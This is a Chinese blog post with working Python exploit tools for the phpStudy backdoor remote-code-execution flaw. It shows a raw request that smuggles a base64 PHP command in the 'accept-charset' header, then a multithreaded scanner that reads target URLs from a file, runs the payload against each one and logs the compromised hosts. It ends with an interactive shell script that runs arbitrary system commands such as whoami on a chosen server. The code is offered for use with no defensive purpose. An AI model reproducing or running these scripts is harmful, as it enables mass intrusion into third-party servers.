编程 PHP

phpstudy后门rce批量利用脚本的实现

Posted in PHP onDecember 12, 2019

写两个一个批量检测的一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

phpstudy后门rce批量利用脚本的实现

执行那段写shell即可

phpstudy后门rce批量利用脚本的实现

晚上抽点空简单写个发包的py:

phpstudy后门rce批量利用脚本的实现

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import queue


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}



def write_shell(url,headers):
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

url = "http://xxx"
write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")




def write_shell(url):
  payload = "echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
  with open('url.txt','r') as f:
    lines = f.read().splitlines()
    task_pool=threadpool.ThreadPool(5)
    requests=threadpool.makeRequests(write_shell,lines)
  for req in requests:
    task_pool.putRequest(req)
    task_pool.wait() 
if __name__ == '__main__':
  main()


#线程队列部分
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()

phpstudy后门rce批量利用脚本的实现

你也可以加上读取php文件的字典这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")



def os_shell(url,headers,payload):
  try:
    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
    # print(r.text)
    res = re.findall("qing(.*?)qing",r.text,re.S)
    print("[ + ]===========The Response:==========[ + ]\n")
    res = "".join(res)
    print(res)
  except:
    print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
  url = input("input the Url , example:\"http://127.0.0.1/\"\n")
  payload = input("input the payload , default:echo system(\"whoami\");\n")
  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
  if payload.strip() == '':
    payload = de_payload
  payload = "echo \"qing\";"+payload+"echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
  }
  os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
  main()

phpstudy后门rce批量利用脚本的实现

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持三水点靠木。

phpstudy后门rce批量利用脚本的实现

- Author -

卿先生

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

整理的9个实用的PHP库简介和下载

Nov 09 PHP

学习php过程中的一些注意点的总结

Oct 25 PHP

ThinkPHP模板中判断volist循环的最后一条记录的验证方法

Jul 01 PHP

PHP错误Allowed memory size of 67108864 bytes exhausted的3种解决办法

Jul 28 PHP

PHP把MSSQL数据导入到MYSQL的方法

Dec 27 PHP

Yii中Model(模型)的创建及使用方法

Dec 28 PHP

PHP闭包函数详解

Feb 13 PHP

php使用parse_str实现查询字符串解析到变量中的方法

Feb 17 PHP

Windows平台实现PHP连接SQL Server2008的方法

Jul 26 PHP

PHP JWT初识及其简单示例

Oct 10 PHP

Laravel 6 将新增为指定队列任务设置中间件的功能

Aug 06 PHP

Thinkphp 在api开发中异常返回依然是html的解决方式

Oct 16 PHP

PHP设计模式之数据访问对象模式（DAO）原理与用法实例分析

Dec 12 #PHP

PHP设计模式之建造者模式（Builder）原理与用法案例详解

Dec 12 #PHP

PHP设计模式之适配器模式（Adapter）原理与用法详解

Dec 12 #PHP

PHP学习记录之常用的魔术常量详解

Dec 12 #PHP

记Laravel调用Gin接口调用formData上传文件的实现方法

Dec 12 #PHP

PHP命名空间(namespace)原理与用法详解

Dec 11 #PHP

在 Laravel 6 中缓存数据库查询结果的方法

Dec 11 #PHP

You might like

MayFish PHP的MVC架构的开发框架

2009/08/13 PHP

支持生僻字且自动识别utf-8编码的php汉字转拼音类

2014/06/27 PHP

php中随机函数mt_rand()与rand()性能对比分析

2014/12/01 PHP

thinkPHP5.0框架开发规范简介

2017/03/25 PHP

php判断str字符串是否是xml格式数据的方法示例

2017/07/26 PHP

JS类的封装及实现代码

2009/12/02 Javascript

jQuery的一些特性和用法整理小结

2010/01/13 Javascript

jQuery动态添加的元素绑定事件处理函数代码

2011/08/02 Javascript

js事件驱动机制浏览器兼容处理方法

2016/07/23 Javascript

JavaScript实现的选择排序算法实例分析

2017/04/14 Javascript

从setTimeout看js函数执行过程

2017/12/19 Javascript

webpack@v4升级踩坑(小结)

2018/10/08 Javascript

详解Vue一个案例引发「内容分发slot」的最全总结

2018/12/02 Javascript

JS/HTML5游戏常用算法之碰撞检测包围盒检测算法详解【凹多边形的分离轴检测算法】

2018/12/13 Javascript

jQuery实现动态生成年月日级联下拉列表示例

2019/05/11 jQuery

通过Python爬虫代理IP快速增加博客阅读量

2016/12/14 Python

Python 逐行分割大txt文件的方法

2017/10/10 Python

Python 实现子类获取父类的类成员方法

2019/01/11 Python

python:按行读入,排序然后输出的方法

2019/07/20 Python

Python autoescape标签用法解析

2020/01/17 Python

python实现拼接图片

2020/03/23 Python

Python Django中间件使用原理及流程分析

2020/06/13 Python

Matplotlib自定义坐标轴刻度的实现示例

2020/06/18 Python

Python非单向递归函数如何返回全部结果

2020/12/18 Python

金鑫耀Java笔试题

2014/09/06 面试题

开会迟到检讨书

2014/02/03 职场文书

报关员个人职业生涯规划书

2014/03/12 职场文书

党支部公开承诺书

2014/03/28 职场文书

幼儿教师师德演讲稿

2014/05/06 职场文书

领导班子个人对照检查剖析材料

2014/09/29 职场文书

党员个人剖析材料（四风问题）

2014/10/07 职场文书

2014年初中班主任工作总结

2014/11/08 职场文书

拾金不昧通报表扬范文

2015/05/05 职场文书

党小组意见范文

2015/06/08 职场文书

基于JavaScript实现年月日三级联动

2021/06/22 Javascript

详解解Django 多对多表关系的三种创建方式

2021/08/23 Python